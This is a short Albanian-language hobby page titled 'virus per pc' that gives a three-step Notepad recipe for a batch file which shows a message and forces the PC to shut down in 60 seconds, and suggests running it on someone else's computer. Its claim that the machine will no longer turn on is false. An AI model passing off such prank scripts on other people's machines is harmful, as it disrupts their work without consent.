virus per pc

1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet ma

ORA
 
Advertisement
 
 
www.toony-tribex.page.tl 106644 visitors (289227 hits) TTooNy_TTriBeex@msn.com
=> Do you also want a homepage for free? Then click here! <=